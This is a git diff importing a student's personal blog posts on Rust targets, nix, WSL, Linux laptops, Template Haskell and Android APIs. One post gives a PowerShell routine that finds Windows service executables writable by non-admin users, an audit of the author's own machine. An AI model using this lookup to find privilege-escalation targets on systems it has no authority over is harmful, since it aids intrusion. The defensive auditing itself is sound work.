import old posts
parent 8ae937faf6, commit 3e4932f921
42 changed files with 2817 additions and 0 deletions
3	content/posts/_index.md	Normal file
@@ -0,0 +1,3 @@
+++
transparent = true
+++
28	content/posts/about.md	Normal file
@@ -0,0 +1,28 @@
+++
title = "About me"
date = "2019-11-10"
draft = false
path = "/about"

[extra]
isPage = true
+++

Hi!

I'm an undergraduate student in Computer Engineering at the University of
British Columbia.

I have done mechanical design for ThunderBots, a RoboCup Small Size League team
building soccer-playing robots. Prior to this, I was on a four-person team
participating in Skills Canada Robotics, and in my last year of high school, we
had the opportunity to [go to Nationals in
Halifax](blog/i-competed-in-skills-canada-robotics), where we achieved first
place for Saskatchewan.

Other than robotics, I am most interested in Rust and embedded systems,
especially the security thereof.

To contact me, email `jade` at this domain (`LFCODE` dot ca).

Jade
she/they
@@ -0,0 +1,64 @@
+++
author = "lf"
categories = ["PowerShell", "windows"]
date = 2019-07-06T07:46:02Z
description = ""
draft = false
isPage = false
path = "/blog/auditing-world-writable-high-privilege-executables"
tags = ["PowerShell", "windows"]
title = "Auditing world-writable high-privilege executables on Windows"
+++

I was reading [Matt Nelson's post on a permissions issue causing privilege escalation](https://posts.specterops.io/cve-2019-13142-razer-surround-1-1-63-0-eop-f18c52b8be0c) and thought "I have too much software installed, I wonder if any of it is vulnerable". <!-- excerpt --> So on to PowerShell! I developed all of this by interactive exploration using `Get-Member`, `Format-List *`, and `Get-Command`.

At the end of this exploration, I did indeed find a vulnerable service. _However_, it was only vulnerable because the application was installed in a world-writable parent directory due to my own carelessness (a situation I fixed). This finding leaves open the question of whether it is the job of a service's installer to set secure permissions on its install directory, or just to inherit the permissions of the parent directory.

```powershell
PS> # First, let's define a function to find if a given path is interesting
PS> function Get-InterestingAccess($path) {
>> get-acl $path | %{$_.access} | ? {$_.filesystemrights.hasflag([System.Security.AccessControl.FileSystemRights]::Modify)} | ? {-not ($_.identityreference -in @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'NT SERVICE\TrustedInstaller'))}
>> }
PS> # stolen shamelessly from StackOverflow (it is ridiculous that you need P/Invoke for this)
PS> $src = @"
using System;
using System.Runtime.InteropServices;
public class ParseCmdline{
    [DllImport("shell32.dll", SetLastError = true)]
    static extern IntPtr CommandLineToArgvW([MarshalAs(UnmanagedType.LPWStr)] string lpCmdLine, out int pNumArgs);

    public static string[] CommandLineToArgs(string commandLine)
    {
        int argc;
        var argv = CommandLineToArgvW(commandLine, out argc);
        if (argv == IntPtr.Zero)
            throw new System.ComponentModel.Win32Exception();
        try
        {
            var args = new string[argc];
            for (var i = 0; i < args.Length; i++)
            {
                var p = Marshal.ReadIntPtr(argv, i * IntPtr.Size);
                args[i] = Marshal.PtrToStringUni(p);
            }

            return args;
        }
        finally
        {
            Marshal.FreeHGlobal(argv);
        }
    }}
"@
PS> add-type -TypeDefinition $src
PS> # let's look for services with vulnerabilities. First find all service executables:
PS> $targets = gcim win32_service | %{[ParseCmdline]::CommandLineToArgs($_.pathname)[0]}
PS> $targets | where { Get-InterestingAccess -path $_ }
# redacted
PS> # also try:
PS> $targets = Get-ScheduledTask | %{ [System.Environment]::ExpandEnvironmentVariables($_.actions.execute) } | ? {$_}
```
@@ -0,0 +1,14 @@
+++
author = "lf"
date = 2018-01-24T23:25:59Z
description = ""
draft = true
path = "/blog/automated-red-hat-like-installation-on-hyper-v"
title = "Automated Red Hat-like installation on Hyper-V"
+++

I have strange requirements sometimes. In this case, I had noticed that I can deploy machines with Kickstart nearly zero-touch, but then as soon as they're installed, I have to go and log in locally to set a hostname, which is even more disruptive when they have already put out a DNS registration with the wrong name.

Clearly this was a place for automation, so I set out to find a way to read VM names from within the guest. In this vein, I found some information about reading these values from within Windows, and eventually found some technical documentation about `hypervkvpd`, which I used to develop a Python script. There were still significant issues integrating it into the Kickstart to make an actual process, but it was a step in the right direction.
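The pool files `hypervkvpd` maintains are simple enough to sketch a reader for. The following is my reconstruction, not the original script: it assumes the record layout from the kernel's Hyper-V KVP documentation (a 512-byte NUL-padded key followed by a 2048-byte NUL-padded value), and the daemon path and key name in the comments are assumptions too.

```python
# Sketch (a reconstruction, not the original script): parse a Hyper-V KVP
# daemon pool file from inside a Linux guest. Each record is a 512-byte
# NUL-padded key followed by a 2048-byte NUL-padded value.
KEY_SIZE = 512
VALUE_SIZE = 2048
RECORD_SIZE = KEY_SIZE + VALUE_SIZE

def parse_kvp_pool(data: bytes) -> dict:
    """Parse raw .kvp_pool_N contents into a {key: value} dict."""
    entries = {}
    for off in range(0, len(data) - RECORD_SIZE + 1, RECORD_SIZE):
        key = data[off:off + KEY_SIZE].split(b"\0", 1)[0].decode()
        value = data[off + KEY_SIZE:off + RECORD_SIZE].split(b"\0", 1)[0].decode()
        if key:
            entries[key] = value
    return entries

# Usage inside a guest would be roughly (path/key assumed):
#   entries = parse_kvp_pool(open("/var/lib/hyperv/.kvp_pool_3", "rb").read())
#   hostname = entries.get("VirtualMachineName")
```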
87	content/posts/custom-targets-in-rust.md	Normal file
@@ -0,0 +1,87 @@
+++
date = "2020-12-29"
draft = false
path = "/blog/custom-targets-in-rust"
tags = ["rust", "embedded"]
title = "Custom targets in Rust"
+++

I'm going to try a new style of blog post for this one, more of a lab notebook
style. Expect normal posts for more interesting topics than fixing build
systems.

## ISSUE: workspaces interact very poorly with targets

### BUGS

* https://github.com/rust-lang/cargo/issues/7004

You can't make Cargo use a separate target per workspace crate, so workspace-
wide builds like `cargo b --workspace` from the workspace root basically don't
work. Put `default-members = []` in the virtual manifest to stop those from
doing anything at all.
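For reference, the workaround looks like this in the virtual manifest (the member names here are made up):

```toml
# Cargo.toml at the workspace root (virtual manifest)
[workspace]
members = ["kernel", "shared"]   # illustrative names
# Empty default-members: a bare `cargo b` at the root builds nothing
# instead of trying to build every crate for a single target.
default-members = []
```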

Workspace-wide documentation also doesn't work, so use `-p PACKAGENAME` with
`cargo doc`, which will document `PACKAGENAME` and all its dependencies,
including transitive dependencies. This is very likely to actually build if the
normal build works.

## ISSUE: `RUST_TARGET_PATH`

### BUGS

* https://stackoverflow.com/questions/48040146/error-loading-target-specification-could-not-find-specification-for-target
* https://github.com/japaric/xargo/issues/44
* https://github.com/rust-lang/cargo/issues/4905

Someone did actually attempt to fix this one, but the `xargo` PR got lost for
a year in 2018 and was abandoned.

Thus you should use `cargo -Z build-std` instead of either `xargo` or
`cargo-xbuild`, per the instructions in the [cargo-xbuild
README](https://docs.rs/crate/cargo-xbuild/0.6.4).

In particular, to avoid both `xargo` and `RUST_TARGET_PATH`:

```text
cargo build -Z build-std=core,compiler_builtins -Z build-std-features=compiler-builtins-mem --release --target ../riscv64imac-mu-kern-elf.json
```

## ISSUE: documentation for target spec files

[This page wrongly suggests the outdated `xargo`.](https://doc.rust-lang.org/stable/rustc/targets/custom.html)

Some of the options are documented in
[codegen-options](https://doc.rust-lang.org/stable/rustc/codegen-options/index.html),
but not really.

I just stole most of mine out of
[SunriseOS](https://github.com/sunriseos/SunriseOS/blob/master/i386-unknown-none.json).

There's some WEIRD caching going on with this, and you probably want to wipe
`target` for each build while messing with this file.

## ISSUE: how do you even get a target spec file?

```text
# Get a starting point for a target spec
rustc +nightly -Zunstable-options --print target-spec-json --target riscv64imac-unknown-none-elf > ../riscv64imac-unknown-mukern-elf.json

# Check if the target spec is round tripping properly
RUST_TARGET_PATH=$(realpath ..) rustc --target riscv64imac-unknown-mukern-elf -Z unstable-options --print target-spec-json
```
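For a sense of what comes out, an abridged spec might look like the following. The field values here are illustrative and from memory; notably, `data-layout` and several other required fields are omitted and should be copied verbatim from the printed builtin spec, not written by hand:

```json
{
  "arch": "riscv64",
  "llvm-target": "riscv64",
  "target-pointer-width": "64",
  "features": "+m,+a,+c",
  "panic-strategy": "abort",
  "relocation-model": "static",
  "code-model": "medium",
  "linker": "rust-lld",
  "linker-flavor": "ld.lld",
  "executables": true
}
```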

## ISSUE: debugging `cargo check` issues in rust-analyzer

Put this incantation in a shell startup file such that it ends up in your RA
process's environment (🙃). I wish it were configurable in VSCode somewhere.

```
export RA_LOG='rust_analyzer=info,salsa=error,flycheck=debug'
```

The RA logs have useful config information, the `salsa` logs are extremely
spammy, and `flycheck` is the `cargo check` module. [Its docs are
here](https://rust-analyzer.github.io/rust-analyzer/flycheck/index.html).
64	content/posts/debugging-template-haskell.md	Normal file
@@ -0,0 +1,64 @@
+++
date = "2020-08-31"
draft = false
path = "/blog/debugging-template-haskell"
tags = ["haskell"]
title = "Debugging Template Haskell"
+++

Template Haskell powers a lot of really neat functionality in Yesod and
friends, but sometimes it can be broken. I'm writing this post to collect all
the info I learned about GHC and Cabal from an unpleasant debugging session in
one place.

I was tracking down a problem causing my [work project](https://github.com/Carnap/Carnap)
to not build on a newer GHC version
([spoiler: it was this `persistent` bug](https://github.com/yesodweb/persistent/issues/1047))
and hit a brick wall when this happened:

```
/home/lf/dev/Carnap/Carnap-Server/Model.hs:16:7: error:
    • Not in scope: type constructor or class ‘CoInstructorId’
    • In the untyped splice:
        $(persistFileWith lowerCaseSettings "config/models")
   |
16 |       $(persistFileWith lowerCaseSettings "config/models")
   |       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
```

The next step was to figure out what was generating these type constructors and
why it was stuffed. [The Internet](https://stackoverflow.com/questions/15851060/ghc-ddump-splices-option-template-haskell)
suggested that I should pass `-ddump-splices -ddump-to-file` to GHC. Cool! So I
did, and it didn't make any visible files. Dammit.

Some more Googling led to the option `-dth-dec-file`, which I also applied to
no observable effect. At this point my emotions were best described as 🤡.

So I read the documentation and found that there are still no mentions of what
the file is called or where it goes. I compiled the version that is known to
work with `-dth-dec-file`, since allegedly that one produces `Filename.th.hs`
files, and this time tried a little harder to find them, using
`find -name '*.th.hs*'`. As it turns out, those files end up in the
`dist-newstyle` directory if running under Cabal. Specifically here:

> `dist-newstyle/build/x86_64-linux/ghc-x.y.z/YourPackage-a.b.c/build/Filename.th.hs`
> `dist-newstyle/build/x86_64-linux/ghc-x.y.z/YourPackage-a.b.c/build/Filename.dump-splices`

Once I found the files, I could track them down on the broken version, except
there was a problem: `-dth-dec-file` appears to run at one of the last compile
phases, which the broken file was not reaching. If you are debugging compile
problems in a file that doesn't itself compile, you should use
`-ddump-splices -ddump-to-file`.

---

In summary:

* Use `-dth-dec-file` for slightly shorter (11k lines vs 12k lines for
  Carnap's models) and possibly more readable TH output, if the file
  containing the splice builds.
* Use `-ddump-splices -ddump-to-file` if the file containing the splice doesn't
  build.
* Outputs will be in `dist-newstyle/build/x86_64-linux/ghc-x.y.z/YourPackage-a.b.c/build/Filename.{th.hs,dump-splices}`
* GHC documentation on dump options is [here](https://downloads.haskell.org/~ghc/latest/docs/html/users_guide/debugging.html#dumping-output)
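As a concrete example, one place to apply these flags under Cabal is in the package description (the package and stanza names here are placeholders):

```
-- in YourPackage.cabal, under the affected library or executable stanza
ghc-options: -ddump-splices -ddump-to-file
```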
71	content/posts/dell-xps-15.md	Normal file
@@ -0,0 +1,71 @@
+++
author = "lf"
categories = ["linux", "arch-linux", "hardware", "laptop", "dell-xps-15"]
date = 2018-03-18T07:12:05Z
description = ""
draft = false
path = "/blog/dell-xps-15"
tags = ["linux", "arch-linux", "hardware", "laptop", "dell-xps-15"]
title = "Dell XPS 15: \"I can't understand why some people _still_ think ACPI is a good idea..\" -Linus Torvalds"
+++

I got my new machine in the mail, an XPS 15 bought on one of the numerous sales which happen pretty much every couple of days, and while most of the hardware is amazing compared to my previous machine (a beat-up X220), there are some significant hardware issues that need to be worked around. Besides, of course, the fact that the keyboard and lack of trackpoint are objectively inferior to the previous machine. <!-- excerpt -->

The first thing that many people may do after booting up a new machine on any operating system is to make sure they got what they paid for and check the detected hardware. So, naturally, I run `lspci`... and it hangs. I could change virtual console, but it said something about a watchdog catching a stalled CPU core. Fun! Off to Google, which states that it's the NVidia driver, specifically related to Optimus (which, by the way, [this video](https://youtu.be/MShbP3OpASA?t=48m13s) remains an excellent description of). So I blacklist it, and `lspci` seems to work fine. Next, I install X and all the other applications I want to use, and being a sensible Arch user, I read the Arch wiki on the hardware, which states that the dedicated graphics card will use a lot of power if it isn't turned off.

So, I turn it off. For this, I use `acpi_call` with a `systemd-tmpfiles` rule to turn it off at boot. The setup is as follows:

```
~ » cat /etc/tmpfiles.d/acpi_call.conf
w /proc/acpi/call - - - - \\_SB.PCI0.PEG0.PEGP._OFF
~ » cat /etc/modules-load.d/acpi_call.conf
acpi_call
```

Next, I get to work doing some programming on it. It was a massive improvement on the previous hardware on account of having a 1080p screen instead of a 1366x768 device-usability-eliminator. However, my terminal-based vim sessions kept getting disturbed by messages such as the following:

```
kernel: pcieport 0000:00:1c.0: PCIe Bus Error: severity=Corrected, type=Data Link Layer, id=00e0(Transmitter ID)
kernel: pcieport 0000:00:1c.0: device [8086:a110] error status/mask=00001000/00002000
```

After looking in the wiki again, I set `pci=nommconf` in the kernel options. At this point I was entirely unconvinced that the `acpi_rev_override=1` stuff was necessary, since I had got rid of any NVidia software that could possibly break my machine.

Satisfied with my handiwork, I put the machine into service and took it to school. Naturally, one may want to put a machine into sleep mode if it is not in use. Unfortunately, doing so was causing it to lock up upon any attempt at waking it. Another strange behaviour that I had started to notice at this point was that Xorg could not be started more than once per boot due to the same hard-lock issue.

As it turns out, this was again the same issue as the sleep one, which is fixed by `acpi_rev_override=1` in the kernel parameters. I had been dissuaded by the Arch developers having disabled `CONFIG_ACPI_REV_OVERRIDE_POSSIBLE` at some point in the past, which was what an outdated forum post suggested (lesson learned: do more research on things which could easily change), but they reenabled it recently.
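For completeness, both kernel parameters together. A GRUB config is shown as an example (bootloaders vary; keep whatever options you already have on the line):

```
# /etc/default/grub -- regenerate with `grub-mkconfig -o /boot/grub/grub.cfg`
GRUB_CMDLINE_LINUX_DEFAULT="quiet pci=nommconf acpi_rev_override=1"
```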

So, finally, the situation:

- Power management appears to work correctly
- Battery life is incredible (but could probably be hugely improved to "ridiculous")
- The touchpad is a touchpad, which means it sucks, although it is one of the better ones
- There is a significant and very annoying key-repeatt isssuee which happens on occasion; some users have reported it also occurs on Windows. It has happened at least 5 times while writing this post.
- I hadn't noticed this earlier, but the *keyboard has a tendency to scratch the screen* while the laptop is closed. Since this is a thoroughly modern machine, there isn't really space to just shove a microfiber cloth between the screen and keyboard like I had done with my X220 with missing rubber standoffs.

### Would I recommend buying one?

**Maybe**. For my use case, it made sense since I want to have a dedicated GPU which can be used in Windows for CAD work. The hardware, with the exception of the keyboard and trackpad, is very nice, especially for the price (a bit more than half what Apple charges for a similarly specced MacBook Pro 15"). If you don't need or want a dedicated GPU, ***buy another machine***. NVidia still has awful Linux problems.

Which machine? Probably a ThinkPad, since they have very good Linux support right out of the box. That being said, I acknowledge that Dell has a group dedicated to Linux support on their hardware, and both companies show a similarly complete lack of desire to lift a finger with regards to pressuring their fingerprint reader vendor (the same one for both companies!) to release the driver spec.

Since Linus Torvalds provides such excellent material to quote:

<pre><code>The thing is, you have two choices:
 - define interfaces in hardware
 - not doing so, and then trying to paper it over with idiotic tables.

Sadly, Intel decided that they should do the latter, and invented ACPI.

There are two kinds of interfaces: the simple ones, and the broken ones.

<...>

The broken ones are the ones where hardware people know what they want to
do, but they think the interface is sucky and complicated, so they make it
_doubly_ sucky by then saying "we'll describe it in the BIOS tables", so
that now there is another (incompetent) group that can _also_ screw things
up. Yeehaa!
</code></pre>
40	content/posts/developer-log-caldnd-and-hacking-on-android.md	Normal file
@@ -0,0 +1,40 @@
+++
author = "lf"
date = 2019-09-28T04:31:43Z
description = ""
draft = true
path = "/blog/developer-log-caldnd-and-hacking-on-android"
title = "Developer Log: CalDND and Hacking on Android"
+++

I have been developing a program called CalDND, which allows for better management of calendar-based automatic Do Not Disturb rules (internally called Zen rules). This post details stuff I learned along the way:

1. How GitHub code search works when you need to find stuff in obscure corners of the Android framework.
2. GitHub code search isn't ideal, so how to get yourself a copy of the Android source.
3. More about how the API actually works.

## GitHub Code Search

Trying to find uses of Android APIs while avoiding their definitions is a pain: GitHub will give you 1000 copies of the Android sources of different ages, most of which are from custom ROMs. The most effective way I've found is to exclude the file names of the usages in the Android framework, for example, `META_DATA_CONFIGURATION_ACTIVITY -filename:ConditionProviderService.java`.

## Getting the sources effectively

I felt it was more comfortable to work with a copy of the sources that I can do anything I want with, so the next task was to [download the Android sources](https://source.android.com/setup/build/downloading): `repo init`, then aggressively trim stuff that I don't think will have any answers using vim (`g/external/d`), and finally do a full `repo sync`. This won't work if you're on very slow internet, as the sync will not finish in any timely manner (I left it overnight and it wasn't done by morning). It is advisable to temporarily rent a fast virtual machine from Linode or another provider and play with the sources on there. I had the answers about the areas of the sources I was interested in within 2 hours, including the rental of the machine. I then just did a `repo sync frameworks/base` and `repo sync packages/apps/Settings` on my PC, which I can `ag` with reasonable performance.

## About the API

Note: this refers to the deprecated API level 24 system. Why? My phone gets the API 29 update halfway through _next year_, and I want to write my app now. I believe a fair amount of it is still true on the new system.

I believe that the API works as follows: you get the permissions to work with the notifications/Do-Not-Disturb system, which allows you to bind a service and also lists your provider in the "Add Automatic Rule" list. [Docs](https://developer.android.com/reference/android/service/notification/ConditionProviderService.html).

If you specify a configuration activity, when your item is selected, it will pop up that activity, but will not give it any extras in the intent. What you're then expected to do is create an `AutomaticZenRule`, put it through [`NotificationManager.addAutomaticZenRule()`](https://developer.android.com/reference/android/app/NotificationManager.html#addAutomaticZenRule(android.app.AutomaticZenRule)), store whatever details you need to, and `.finish()` your activity.

Future attempts to click on the automatic rule in the settings page will result in your activity being started with the extra [`EXTRA_RULE_ID`](https://developer.android.com/reference/android/service/notification/ConditionProviderService.html#EXTRA_RULE_ID), which you can then use to retrieve the settings for that rule from your storage.

### The weird parts about the API

There is one really confusing thing about this API, besides the fact that nobody uses it: the schedule is stored as a **URI**. What?! To further confuse things, the format of the URI in question is not thoroughly documented in the official documentation, which is a large part of why I had to read the Android sources to begin with (as it turns out, it's essentially totally free-form, but it took some significant source-reading to understand that).

Examples of how the system rules parse/use these URIs are in `frameworks/base/core/java/android/service/notification/ZenModeConfig.java`. The class that you're supposed to use to make these is [Condition](https://developer.android.com/reference/android/service/notification/Condition.html). They are formatted like so: `condition://AUTHORITY/WHATEVER_YOU_WANT`, where the authority is your package name, and the path component is whatever you want to use to identify this rule. It is convenient to encode the entire data of the rule inside the rule URI if possible, since you can then avoid writing code for persistent storage.
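To illustrate how free-form the scheme is, here is a language-neutral sketch of building and picking apart such a URI (Python used only for illustration; the package name and rule-key format are made up):

```python
# Sketch: condition URIs are ordinary URIs with a conventional shape,
# condition://<your.package.name>/<anything identifying the rule>.
from urllib.parse import urlparse, quote, unquote

PACKAGE = "com.example.caldnd"  # stand-in package name

def make_condition_uri(rule_key: str) -> str:
    # Percent-encode the key so any rule data survives the round trip
    return f"condition://{PACKAGE}/{quote(rule_key, safe='')}"

def rule_key_from_uri(uri: str) -> str:
    parsed = urlparse(uri)
    assert parsed.scheme == "condition" and parsed.netloc == PACKAGE
    return unquote(parsed.path.lstrip("/"))

uri = make_condition_uri("calendar=work;lead=10m")
# round-trips back to the original key
assert rule_key_from_uri(uri) == "calendar=work;lead=10m"
```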
88	content/posts/development-in-wsl.md	Normal file
@@ -0,0 +1,88 @@
+++
date = "2020-07-19"
draft = false
path = "/blog/development-in-wsl"
tags = []
title = "My software development setup in WSL 2"
+++

I'm writing this post because I work every day in WSL 2 on my main computer and
I feel it might be useful to those trying to get a productive setup running.

I use Arch Linux inside WSL, with the [ArchWSL
project](https://github.com/yuk7/ArchWSL). Arch is what I've installed on my
other computers, and it's compelling for the same reasons: up-to-date packages,
reliability, and ease of packaging things for it.

## Shell/completion performance

Since I use a zsh shell with syntax highlighting and relatively slow command
completion, I found that the stock setup of putting the ~30 directories in my
Windows PATH into the Linux one was causing massive shell performance issues.
This is resolved with some `wsl.conf` options on the Linux side:

`/etc/wsl.conf`:

```
[interop]
enabled = true
appendWindowsPath = false

# It was also not picking up my DNS settings so have it stop trying to do that
[network]
generateResolvConf = false
```

## Terminal

Before switching to WSL for essentially all of my needs (except flashing my QMK
peripherals), I used msys2, which uses mintty as a terminal. WSL with mintty is
done through [wsltty](https://github.com/mintty/wsltty) these days, and that is
what I use. It does not require significant configuration.

The new [Windows Terminal](https://github.com/microsoft/terminal) is likely
viable these days (and possibly faster in terms of rendering performance), but
I haven't investigated it.

## Daemons

I use nix for managing Haskell dependencies for a work project, and I sometimes
need to use Docker for development. Neither WSL nor WSL 2 natively supports
running systemd as an init system. With WSL 2, process ID namespaces can be
used to make a namespace where systemd is PID 1, in which you can just run it.
I use a tool called [genie](https://github.com/arkane-systems/genie) that
manages this automatically.

## Clipboard integration

Download [`win32yank`](https://github.com/equalsraf/win32yank), make this file,
and `chmod +x` it, and neovim will pick it up as the clipboard provider:

`/usr/local/bin/win32yank.exe`:

```
#!/bin/sh

/mnt/c/Progs/win32yank.exe "$@"
```

This hack is required because PATH integration is disabled. I believe
you could also copy the executable into a bin folder (don't change the
extension) and it would work without the intermediate script.

## Memory

I limit the memory available to my WSL instance below the default 80% of my
RAM because I would rather have stuff get killed on the Linux side, or have
the Linux kernel drop some of its cache, than have Windows swap a whole bunch.
Further, I sometimes run `sudo sysctl vm.drop_caches=2` to drop Linux caches
when `vmmem` is causing memory pressure on the rest of my system.

`%USERPROFILE%\.wslconfig`:

```
[wsl2]
memory=20GB
swap=0
```
332
content/posts/finding-functions-in-nixpkgs.md
Normal file
332
content/posts/finding-functions-in-nixpkgs.md
Normal file
|
|
@ -0,0 +1,332 @@
|
||||||
|
+++
|
||||||
|
date = "2021-02-19"
|
||||||
|
draft = false
|
||||||
|
path = "/blog/finding-functions-in-nixpkgs"
|
||||||
|
tags = ["nix"]
|
||||||
|
title = "Finding functions in nixpkgs"
|
||||||
|
+++
|
||||||
|
|
||||||
|
It is a poorly guarded secret that the most effective way to get documentation
|
||||||
|
on nixpkgs or nix functions is to read the source code. The hard part of that
|
||||||
|
is *finding* the right source code. I'll document a few static and dynamic
|
||||||
|
analysis strategies to find the documentation or definition of things in
|
||||||
|
nixpkgs going from trivial to some effort.
|
||||||
|
|
||||||
|
## Simple
|
||||||
|
|
||||||
|
These work on functions that have no wrappers around them, which account for
|
||||||
|
most library functions in nixpkgs.
|
||||||
|
|
||||||
|
### Static
|
||||||
|
|
||||||
|
Static analysis is, in my view, slightly slower, since you can't be sure you're
|
||||||
|
getting the function you're seeing in the interactive environment in `nix repl`
|
||||||
|
or elsewhere.
|
||||||
|
|
||||||
|
There are two tools for this that are capable of parsing nix source, `nix-doc`
|
||||||
|
(my project) and `manix`, both of which are in nixpkgs.
|
||||||
|
|
||||||
|
Note that `nix-doc` will only work from within a nixpkgs checkout or if you
|
||||||
|
pass it a second parameter of where your nixpkgs is. This is mostly because
|
||||||
|
`nix-doc`'s main focus has switched to being mainly on providing a function in
|
||||||
|
the REPL.
|
||||||
|
|
||||||
|
There is also a [fork of `rnix-lsp`](https://github.com/elkowar/rnix-lsp) which
|
||||||
|
provides `manix` based documentation from within editors.
|
||||||
|
|
||||||
|
```
|
||||||
|
# your nixpkgs checkout
|
||||||
|
$ cd ~/dev/nixpkgs; nix-shell -p manix nix-doc
|
||||||
|
[nix-shell:~/dev/nixpkgs]$ manix foldl
|
||||||
|
```

<details>
<summary>
<code class="language-text">manix</code> output
</summary>

<pre class="language-text"><code>
<b>Here's what I found in nixpkgs:</b> <font color="#D0CFCC">lib.lists.foldl'</font>
<font color="#D0CFCC">lib.lists.foldl</font> <font color="#D0CFCC">lib.foldl</font>
<font color="#D0CFCC">lib.foldl'</font> <font color="#D0CFCC">haskellPackages.foldl-statistics</font>
<font color="#D0CFCC">haskellPackages.foldl-transduce-attoparsec</font>
<font color="#D0CFCC">haskellPackages.foldl-incremental</font> <font color="#D0CFCC">haskellPackages.foldl-exceptions</font>
<font color="#D0CFCC">haskellPackages.foldl</font> <font color="#D0CFCC">haskellPackages.foldl-transduce</font>

<font color="#D0CFCC">Nixpkgs Comments</font>
<font color="#26A269">────────────────────</font>
# <font color="#12488B"><b>foldl</b></font> (<font color="#D0CFCC">lib/lists.nix</font>)
“left fold”, like `foldr`, but from the left:
`foldl op nul [x_1 x_2 ... x_n] == op (... (op (op nul x_1) x_2) ... x_n)`.

Type: foldl :: (b -> a -> b) -> b -> [a] -> b

Example:
lconcat = foldl (a: b: a + b) "z"
lconcat [ "a" "b" "c" ]
=> "zabc"
# different types
lstrange = foldl (str: int: str + toString (int + 1)) "a"
lstrange [ 1 2 3 4 ]
=> "a2345"

<font color="#D0CFCC">NixOS Documentation</font>
<font color="#26A269">────────────────────</font>
# <font color="#12488B"><b>lib.lists.foldl'</b></font> (<font color="#2AA1B3">foldl' :: (b -> a -> b) -> b -> [a] -> b</font>)
Strict version of `foldl`.

<font color="#D0CFCC">NixOS Documentation</font>
<font color="#26A269">────────────────────</font>
# <font color="#12488B"><b>lib.lists.foldl</b></font> (<font color="#2AA1B3">foldl :: (b -> a -> b) -> b -> [a] -> b</font>)
“left fold”, like `foldr`, but from the left:
`foldl op nul [x_1 x_2 ... x_n] == op (... (op (op nul x_1) x_2) ... x_n)`.

Arguments:
<font color="#26A269">op</font>: Function argument
<font color="#26A269">nul</font>: Function argument
<font color="#26A269">list</font>: Function argument

Example:

<font color="#D0CFCC">lconcat = foldl (a: b: a + b) "z"</font>
<font color="#D0CFCC">lconcat [ "a" "b" "c" ]</font>
<font color="#D0CFCC">=> "zabc"</font>
<font color="#D0CFCC"># different types</font>
<font color="#D0CFCC">lstrange = foldl (str: int: str + toString (int + 1)) "a"</font>
<font color="#D0CFCC">lstrange [ 1 2 3 4 ]</font>
<font color="#D0CFCC">=> "a2345"</font>
</code></pre>

</details>

`manix` includes the file path with the documentation from the nixpkgs sources,
but no line number. It also includes NixOS manual documentation, which I
appreciate.

```
[nix-shell:~/dev/nixpkgs]$ nix-doc foldl
```

<details>
<summary>
<code class="language-text">nix-doc</code> output
</summary>

<pre class="language-text"><code>
“left fold”, like `foldr`, but from the left:
`foldl op nul [x_1 x_2 ... x_n] == op (... (op (op nul x_1) x_2) ... x_n)`.

Type: foldl :: (b -> a -> b) -> b -> [a] -> b

Example:
lconcat = foldl (a: b: a + b) "z"
lconcat [ "a" "b" "c" ]
=> "zabc"
different types
lstrange = foldl (str: int: str + toString (int + 1)) "a"
lstrange [ 1 2 3 4 ]
=> "a2345"
<font color="#FFFFFF"><b>foldl</b></font> = op: nul: list: ...
# ./lib/lists.nix:80

</code></pre>
</details>

`nix-doc` basically gets you the same thing, but it is missing `foldl'`, which
I think is a bug in the `nix-doc` command-line interface. It does, however,
give you a source path with a line number, so you can use middle click or
`C-w F` or similar to go directly to the function's source in your editor.

### Dynamic

This is the wheelhouse of `nix-doc`. It adds the two functions demonstrated
below (added by the `nix-doc` Nix plugin; see [the README][1] for installation
instructions):

[1]: https://github.com/lf-/nix-doc/#nix-plugin
<pre class="language-text"><code>nix-repl> n = import <nixpkgs> {}

nix-repl> builtins.unsafeGetLambdaPos n.lib.foldl
{ column = <font color="#2AA1B3">11</font>; file = <font color="#A2734C">"/nix/store/...-nixpkgs-.../nixpkgs/lib/lists.nix"</font>; line = <font color="#2AA1B3">80</font>; }

nix-repl> builtins.doc n.lib.foldl
“left fold”, like `foldr`, but from the left:
`foldl op nul [x_1 x_2 ... x_n] == op (... (op (op nul x_1) x_2) ... x_n)`.

Type: foldl :: (b -> a -> b) -> b -> [a] -> b

Example:
lconcat = foldl (a: b: a + b) "z"
lconcat [ "a" "b" "c" ]
=> "zabc"
different types
lstrange = foldl (str: int: str + toString (int + 1)) "a"
lstrange [ 1 2 3 4 ]
=> "a2345"
<font color="#FFFFFF"><b>func</b></font> = op: nul: list: ...
# /nix/store/...-nixpkgs-.../nixpkgs/lib/lists.nix:80
<font color="#2AA1B3">null</font>
</code>
</pre>

You can also get this information using `builtins.unsafeGetAttrPos`, an
undocumented built-in function in Nix itself:

<pre class="language-text"><code>
nix-repl> builtins.unsafeGetAttrPos "foldl" n
{ column = <font color="#2AA1B3">25</font>; file = <font color="#A2734C">"/nix/store/...-nixpkgs-.../nixpkgs/lib/default.nix"</font>; line = <font color="#2AA1B3">82</font>; }
</code></pre>

## Functions without documentation

nixpkgs has a few of these. Let's pick on the Haskell infrastructure, because I
am most familiar with it.

First, let's try some static analysis to find the signature or source of
`nixpkgs.haskell.lib.disableLibraryProfiling`:

<pre class="language-text"><code>
<font color="#26A269"><b>[nix-shell:~/dev/nixpkgs]$</b></font> manix disableLibraryProfiling

<font color="#26A269"><b>[nix-shell:~/dev/nixpkgs]$</b></font> nix-doc disableLibraryProfiling

<font color="#26A269"><b>[nix-shell:~/dev/nixpkgs]$</b></font> rg disableLibraryProfiling
<font color="#A347BA">pkgs/development/haskell-modules/configuration-common.nix</font>
<font color="#26A269">50</font>: ghc-heap-view = <font color="#C01C28"><b>disableLibraryProfiling</b></font> super.ghc-heap-view;
<font color="#26A269">51</font>: ghc-datasize = <font color="#C01C28"><b>disableLibraryProfiling</b></font> super.ghc-datasize;
<font color="#26A269">1343</font>: graphql-engine = <font color="#C01C28"><b>disableLibraryProfiling</b></font>( overrideCabal (super.graphql-engine.override {

<font color="#A347BA">pkgs/development/haskell-modules/lib.nix</font>
<font color="#26A269">177</font>: <font color="#C01C28"><b>disableLibraryProfiling</b></font> = drv: overrideCabal drv (drv: { enableLibraryProfiling = false; });

<font color="#A347BA">pkgs/development/haskell-modules/configuration-nix.nix</font>
<font color="#26A269">97</font>: hercules-ci-agent = <font color="#C01C28"><b>disableLibraryProfiling</b></font> super.hercules-ci-agent;
</code></pre>

Oh dear! That's not good. Neither the `manix` nor the `nix-doc` command-line
tool found the function. This leaves `rg`, which is not based on the Nix
